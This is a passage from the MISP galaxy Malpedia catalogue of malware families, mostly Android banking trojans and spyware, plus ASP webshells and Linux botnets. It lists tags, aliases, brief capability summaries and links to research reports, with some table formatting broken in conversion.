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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra">https://malpedia.caad.fkie.fraunhofer.de/details/apk.hydra</a></td>
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</table>
IPStorm (Android)

Android variant of IPStorm (InterPlanetary Storm).

The tag is: `misp-galaxy:malpedia="IPStorm (Android)"

IPStorm (Android) is also known as:

- InterPlanetary Storm

Table 863. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ipstorm</a></td>
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IRRat

The tag is: `misp-galaxy:malpedia="IRRat"

IRRat is also known as:

Table 864. Table References

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JadeRAT

The tag is: `misp-galaxy:malpedia="JadeRAT"

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Table 865. Table References

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<td><a href="https://blog.lookout.com/mobile-threat-jaderat">https://blog.lookout.com/mobile-threat-jaderat</a></td>
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Joker

The tag is: misp-galaxy:malpedia="Joker"

Joker is also known as:

Table 866. Table References

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KevDroid

The tag is: misp-galaxy:malpedia="KevDroid"

KevDroid is also known as:

Table 867. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid">https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid</a></td>
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Koler

The tag is: misp-galaxy:malpedia="Koler"

Koler is also known as:

Table 868. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler">https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler</a></td>
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KSREMOTE

The tag is: misp-galaxy:malpedia="KSREMOTE"

KSREMOTE is also known as:

Table 869. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote">https://malpedia.caad.fkie.fraunhofer.de/details/apk.ksremote</a></td>
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Loki

The tag is: misp-galaxy:malpedia="Loki"

Loki is also known as:

Table 870. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki">https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki</a></td>
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<tr>
<td><a href="http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/">http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/</a></td>
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LokiBot

Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot.

The tag is: misp-galaxy:malpedia="LokiBot"

LokiBot is also known as:

Table 871. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot</a></td>
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<td><a href="https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html">https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html</a></td>
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LuckyCat

The tag is: misp-galaxy:malpedia="LuckyCat"
LuckyCat is also known as:

*Table 872. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat</a></td>
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**Mandrake**

The tag is: `misp-galaxy:malpedia="Mandrake"`

Mandrake is also known as:

*Table 873. Table References*

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**Marcher**

The tag is: `misp-galaxy:malpedia="Marcher"`

Marcher is also known as:

- ExoBot

*Table 874. Table References*

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<td><a href="https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware">https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware</a></td>
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<td><a href="https://www.clientsidedetection.com/exobot_v2_update_staying_ahead_of_the_competition.html">https://www.clientsidedetection.com/exobot_v2_update_staying_ahead_of_the_competition.html</a></td>
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**MazarBot**

The tag is: `misp-galaxy:malpedia="MazarBot"`

MazarBot is also known as:

*Table 875. Table References*
Medusa (Android)

According to ThreatFabric, this is an Android banking trojan under active development as of July 2020. It is using TCP for C&C communication and targets Turkish banks.

The tag is: `misp-galaxy:malpedia="Medusa (Android)"`

Medusa (Android) is also known as:

- Gorgona

Meterpreter (Android)

The tag is: `misp-galaxy:malpedia="Meterpreter (Android)"

Meterpreter (Android) is also known as:

Monokle

Monokle is a sophisticated mobile surveillanceware that possesses remote access trojan (RAT) functionality, advanced data exfiltration techniques as well as the ability to install an attacker-specified certificate to the trusted certificates on an infected device that would allow for man-in-the-middle (MITM) attacks. According to Lookout researchers, It is believed to be developed by
Special Technology Center (STC), which is a Russian defense contractor sanctioned by the U.S. Government in connection to alleged interference in the 2016 US presidential elections.

The tag is: misp-galaxy:malpedia="Monokle"

Monokle is also known as:

Table 878. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle">https://malpedia.caad.fkie.fraunhofer.de/details/apk.monokle</a></td>
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**MoqHao**

The tag is: misp-galaxy:malpedia="MoqHao"

MoqHao is also known as:

- Shaoye
- XLoader

Table 879. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao">https://malpedia.caad.fkie.fraunhofer.de/details/apk.moqhao</a></td>
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<td><a href="https://securelist.com/roaming-mantis-part-v/96250/">https://securelist.com/roaming-mantis-part-v/96250/</a></td>
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**Mudwater**

The tag is: misp-galaxy:malpedia="Mudwater"

Mudwater is also known as:

Table 880. Table References

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<td><a href="https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf">https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf</a></td>
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</table>
**MysteryBot**

MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality.

The tag is: *misp-galaxy:malpedia="MysteryBot"*

MysteryBot is also known as:

*Table 881. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot</a></td>
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<td><a href="https://www.threatfabric.com/blogs/mysterybot/a_new_android_banking_trojan_ready_for_android_7_and_8.html">https://www.threatfabric.com/blogs/mysterybot/a_new_android_banking_trojan_ready_for_android_7_and_8.html</a></td>
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**OmniRAT**

The tag is: *misp-galaxy:malpedia="OmniRAT"*

OmniRAT is also known as:

*Table 882. Table References*

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**Oscorp**

The tag is: *misp-galaxy:malpedia="Oscorp"*

Oscorp is also known as:

*Table 883. Table References*

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PackChat

The tag is: misp-galaxy:malpedia="PackChat"

PackChat is also known as:

Table 884. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.packchat</a></td>
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PhantomLance

The tag is: misp-galaxy:malpedia="PhantomLance"

PhantomLance is also known as:

- PWNDROID1

Table 885. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance">https://malpedia.caad.fkie.fraunhofer.de/details/apk.phantomlance</a></td>
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Podec

The tag is: misp-galaxy:malpedia="Podec"

Podec is also known as:

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X-Agent (Android)

The tag is: misp-galaxy:malpedia="X-Agent (Android)"

X-Agent (Android) is also known as:

• Popr-d30

Table 887. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30">https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30</a></td>
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Fake Pornhub

The tag is: misp-galaxy:malpedia="Fake Pornhub"

Fake Pornhub is also known as:

Table 888. Table References

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Premier RAT

The tag is: misp-galaxy:malpedia="Premier RAT"

Premier RAT is also known as:

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Rana

The tag is: misp-galaxy:malpedia="Rana"

Rana is also known as:

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**Raxir**

The tag is: *misp-galaxy:malpedia="Raxir"*

Raxir is also known as:

*Table 891. Table References*

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**RedAlert2**

RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server. The malware also has the ability to block incoming calls from banks, to prevent the victim of being notified. As a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates.

The tag is: *misp-galaxy:malpedia="RedAlert2"*

RedAlert2 is also known as:

*Table 892. Table References*

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<td><a href="https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html">https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html</a></td>
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</table>

**Retefe (Android)**

The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim’s phone doesn’t get infected.

The tag is: *misp-galaxy:malpedia="Retefe (Android)"*

Retefe (Android) is also known as:
**Riltok**

The tag is: `misp-galaxy:malpedia=“Riltok”`

Riltok is also known as:

**Roaming Mantis**

The tag is: `misp-galaxy:malpedia=“Roaming Mantis”`

Roaming Mantis is also known as:

**Rogue**

The tag is: `misp-galaxy:malpedia=“Rogue”`

Rogue is also known as:
Rootnik

The tag is: `misp-galaxy:malpedia="Rootnik"`

Rootnik is also known as:

Table 897. Table References

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Sauron Locker

The tag is: `misp-galaxy:malpedia="Sauron Locker"`

Sauron Locker is also known as:

Table 898. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker">https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker</a></td>
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SilkBean

The tag is: `misp-galaxy:malpedia="SilkBean"`

SilkBean is also known as:

Table 899. Table References

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Skygofree

The tag is: misp-galaxy:malpedia="Skygofree"

Skygofree is also known as:

Table 900. Table References

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Slempo

The tag is: misp-galaxy:malpedia="Slempo"

Slempo is also known as:

- SlemBunk

Table 901. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo">https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolution.html">https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolution.html</a></td>
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Slocker

The tag is: misp-galaxy:malpedia="Slocker"

Slocker is also known as:

Table 902. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker">https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker</a></td>
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SmsAgent

The tag is: misp-galaxy:malpedia="SmsAgent"
SmsAgent is also known as:

Table 903. Table References

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SpyMax

The tag is: misp-galaxy:malpedia="SpyMax"

SpyMax is also known as:

Table 907. Table References

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<td><a href="https://twitter.com/malwrhuntesteam/status/1250412485808717826">https://twitter.com/malwrhuntesteam/status/1250412485808717826</a></td>
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SpyNote

The tag is: misp-galaxy:malpedia="SpyNote"

SpyNote is also known as:

Table 908. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote">https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote</a></td>
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<td><a href="https://docs.google.com/document/d/1oYX3uN6KxlX_StzTH0s0yFNNoHDnV8VgmVqUSWoeErc/edit#heading=h.hcd1wvpsrgfr">https://docs.google.com/document/d/1oYX3uN6KxlX_StzTH0s0yFNNoHDnV8VgmVqUSWoeErc/edit#heading=h.hcd1wvpsrgfr</a></td>
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<tr>
<td><a href="https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan">https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan</a></td>
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StealthAgent

The tag is: misp-galaxy:malpedia="StealthAgent"

StealthAgent is also known as:

Table 909. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent">https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent</a></td>
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<tr>
<td><a href="https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF">https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF</a></td>
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Stealth Mango

The tag is: *misp-galaxy:malpedia*="Stealth Mango"

Stealth Mango is also known as:

Table 910. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango">https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango</a></td>
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Svpeng

The tag is: *misp-galaxy:malpedia*="Svpeng"

Svpeng is also known as:

Table 911. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng">https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng</a></td>
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Switcher

The tag is: *misp-galaxy:malpedia*="Switcher"

Switcher is also known as:

Table 912. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher">https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher</a></td>
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TalentRAT

The tag is: *misp-galaxy:malpedia*="TalentRAT"

TalentRAT is also known as:

- Assassin RAT

Table 913. Table References

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TeleRAT

The tag is: `misp-galaxy:malpedia="TeleRAT"`

TeleRAT is also known as:

Table 914. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat</a></td>
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TemptingCedar Spyware

The tag is: `misp-galaxy:malpedia="TemptingCedar Spyware"`

TemptingCedar Spyware is also known as:

Table 915. Table References

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<th>Links</th>
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<tr>
<td><a href="https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware">https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware</a></td>
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ThiefBot

The tag is: `misp-galaxy:malpedia="ThiefBot"`

ThiefBot is also known as:

Table 916. Table References

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</table>

TinyZ

The tag is: `misp-galaxy:malpedia="TinyZ"`
TinyZ is also known as:

- Catelites Android Bot
- MarsElite Android Bot

**Table 917. Table References**

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz">https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz</a></td>
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<tr>
<td><a href="http://blog.group-ib.com/cron">http://blog.group-ib.com/cron</a></td>
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**Titan**

The tag is: `misp-galaxy:malpedia="Titan"`

Titan is also known as:

**Table 918. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan">https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan</a></td>
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<tr>
<td><a href="https://blog.lookout.com/titan-mobile-threat">https://blog.lookout.com/titan-mobile-threat</a></td>
</tr>
<tr>
<td><a href="https://www.alienvault.comblogs/labs-research/delivery-keyboy">https://www.alienvault.comblogs/labs-research/delivery-keyboy</a></td>
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**Triada**

The tag is: `misp-galaxy:malpedia="Triada"`

Triada is also known as:

**Table 919. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada">https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada</a></td>
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<tr>
<td><a href="http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html">http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html</a></td>
</tr>
<tr>
<td><a href="https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/">https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/">https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/</a></td>
</tr>
<tr>
<td><a href="https://security.googleblog.com/2019/06/pha-family-highlights-triada.html">https://security.googleblog.com/2019/06/pha-family-highlights-triada.html</a></td>
</tr>
</tbody>
</table>
Triout

Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware's surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.

The tag is: misp-galaxy:malpedia="Triout"

Triout is also known as:

Table 920. Table References

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout">https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout</a></td>
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Unidentified APK 001

The tag is: misp-galaxy:malpedia="Unidentified APK 001"

Unidentified APK 001 is also known as:

Table 921. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001</a></td>
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Unidentified APK 002

The tag is: misp-galaxy:malpedia="Unidentified APK 002"

Unidentified APK 002 is also known as:

Table 922. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002">https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002</a></td>
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</tbody>
</table>

Unidentified APK 004

According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.

The tag is: misp-galaxy:malpedia="Unidentified APK 004"

Unidentified APK 004 is also known as:
**Unidentified APK 005**

The tag is: `misp-galaxy:malpedia="Unidentified APK 005"`

Unidentified APK 005 is also known as:

**vamp**

Related to the micropsia windows malware and also sometimes named micropsia.

The tag is: `misp-galaxy:malpedia="vamp"`

vamp is also known as:

- android.micropsia

**Viper RAT**

The tag is: `misp-galaxy:malpedia="Viper RAT"`

Viper RAT is also known as:
Table 926. Table References

<table>
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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat</a></td>
</tr>
<tr>
<td><a href="https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/">https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/</a></td>
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**WireX**

The tag is: *misp-galaxy:malpedia=“WireX”*

WireX is also known as:

Table 927. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex">https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex</a></td>
</tr>
<tr>
<td><a href="https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/">https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/</a></td>
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**WolfRAT**

The tag is: *misp-galaxy:malpedia=“WolfRAT”*

WolfRAT is also known as:

Table 928. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html">https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html</a></td>
</tr>
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</table>

**Wroba**

According to Avira, this is a banking trojan targeting Japan.

The tag is: *misp-galaxy:malpedia=“Wroba”*

Wroba is also known as:

Table 929. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba">https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba</a></td>
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Xbot

The tag is: misp-galaxy:malpedia="Xbot"

Xbot is also known as:

Table 930. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot">https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot</a></td>
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XLoader

The tag is: misp-galaxy:malpedia="XLoader"

XLoader is also known as:

Table 931. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader">https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader</a></td>
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<tr>
<td><a href="https://securelist.com/roaming-mantis-part-v/96250/">https://securelist.com/roaming-mantis-part-v/96250/</a></td>
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XploitSPY

The tag is: misp-galaxy:malpedia="XploitSPY"

XploitSPY is also known as:

Table 932. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy">https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy</a></td>
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<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1249768400806653952">https://twitter.com/malwrhunterteam/status/1249768400806653952</a></td>
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**XRat**

The tag is: `misp-galaxy:malpedia="XRat"`

XRat is also known as:

*Table 933. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat">https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat</a></td>
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<tr>
<td><a href="https://blog.lookout.com/xrat-mobile-threat">https://blog.lookout.com/xrat-mobile-threat</a></td>
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**YellYouth**

The tag is: `misp-galaxy:malpedia="YellYouth"`

YellYouth is also known as:

*Table 934. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth">https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth</a></td>
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<tr>
<td><a href="https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html">https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html</a></td>
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**Zen**

The tag is: `misp-galaxy:malpedia="Zen"`

Zen is also known as:

*Table 935. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen">https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen</a></td>
</tr>
<tr>
<td><a href="https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html">https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html</a></td>
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**ZooPark**

The tag is: `misp-galaxy:malpedia="ZooPark"`

ZooPark is also known as:

*Table 936. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark">https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark</a></td>
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</table>
Ztorg

The tag is: misp-galaxy:malpedia="Ztorg"

Ztorg is also known as:

• Qysly

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.

The tag is: misp-galaxy:malpedia="TwoFace"

TwoFace is also known as:

• HighShell
• HyperShell
• Minion
Table 938. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface">https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface</a></td>
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<td><a href="https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view">https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/">https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=GjquFKa4afU">https://www.youtube.com/watch?v=GjquFKa4afU</a></td>
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<td><a href="https://www.youtube.com/watch?time_continue=1333&amp;v=1CGAmjAV8nI">https://www.youtube.com/watch?time_continue=1333&amp;v=1CGAmjAV8nI</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/">https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/</a></td>
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Unidentified ASP 001 (Webshell)

The tag is: `misp-galaxy:malpedia=“Unidentified ASP 001 (Webshell)”`

Unidentified ASP 001 (Webshell) is also known as:

Table 939. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001</a></td>
</tr>
</tbody>
</table>

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: `misp-galaxy:malpedia=“ACBackdoor (ELF)”`

ACBackdoor (ELF) is also known as:

Table 940. Table References
AgeLocker

The tag is: `misp-galaxy:malpedia="AgeLocker"`

AgeLocker is also known as:

```
Table 941. Table References
```

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker">https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/IntezerLabs/status/1326880812344676352">https://twitter.com/IntezerLabs/status/1326880812344676352</a></td>
</tr>
</tbody>
</table>

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

The tag is: `misp-galaxy:malpedia="AirDropBot"`

AirDropBot is also known as:

- CloudBot

```
Table 942. Table References
```

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop">https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop</a></td>
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Aisuru

Honeypot-aware variant of Mirai.

The tag is: `misp-galaxy:malpedia="Aisuru"`

Aisuru is also known as:

```
Table 943. Table References
```

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</table>

Anchor_DNS

The tag is: misp-galaxy:malpedia="Anchor_DNS"

Anchor_DNS is also known as:

Table 944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru

ANGRYREBEL

The tag is: misp-galaxy:malpedia="ANGRYREBEL"

ANGRYREBEL is also known as:

• Ghost RAT

Table 945. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel
https://www.secureworks.com/research/threat-profiles/bronze-olive

azazel

Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features

The tag is: misp-galaxy:malpedia="azazel"

azazel is also known as:
Irc16

The tag is: `misp-galaxy:malpedia="Irc16"`

Irc16 is also known as:

Bashlite

The tag is: `misp-galaxy:malpedia="Bashlite"`

Bashlite is also known as:

- Gafgyt
- gayfgt
- lizkebab
- qbot
- torlus
**BCMPUPnP_Hunter**

The tag is: `misp-galaxy:malpedia="BCMPUPnP_Hunter"`

BCMPUPnP_Hunter is also known as:

Table 949. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter">https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter</a></td>
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</tbody>
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**BigViktor**

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

The tag is: `misp-galaxy:malpedia="BigViktor"`

BigViktor is also known as:

Table 950. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor">https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor</a></td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/bigviktor-dga-botnet/">https://blog.netlab.360.com/bigviktor-dga-botnet/</a></td>
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**Blackrota**

The tag is: `misp-galaxy:malpedia="Blackrota"`

Blackrota is also known as:

Table 951. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota">https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota</a></td>
</tr>
<tr>
<td><a href="https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/">https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/</a></td>
</tr>
</tbody>
</table>

**Break out the Box**

This is a pentesting tool and according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common
CI/CD technologies."

It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.

The tag is: `misp-galaxy:malpedia="Break out the Box"`

Break out the Box is also known as:

- BOtB

**Table 952. Table References**

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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb">https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb</a></td>
</tr>
<tr>
<td><a href="https://github.com/brompwnie/botb">https://github.com/brompwnie/botb</a></td>
</tr>
</tbody>
</table>

**CDorked**

This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech

The tag is: `misp-galaxy:malpedia="CDorked"`

CDorked is also known as:

- CDorked.A

**Table 953. Table References**

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked</a></td>
</tr>
<tr>
<td><a href="https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html">https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/">https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/</a></td>
</tr>
</tbody>
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**CDRThief**

The tag is: `misp-galaxy:malpedia="CDRThief"`

CDRThief is also known as:

**Table 954. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief</a></td>
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</table>
Cephei

The tag is: `misp-galaxy:malpedia="Cephei"

Cephei is also known as:

Table 955. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei">https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei</a></td>
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Cetus

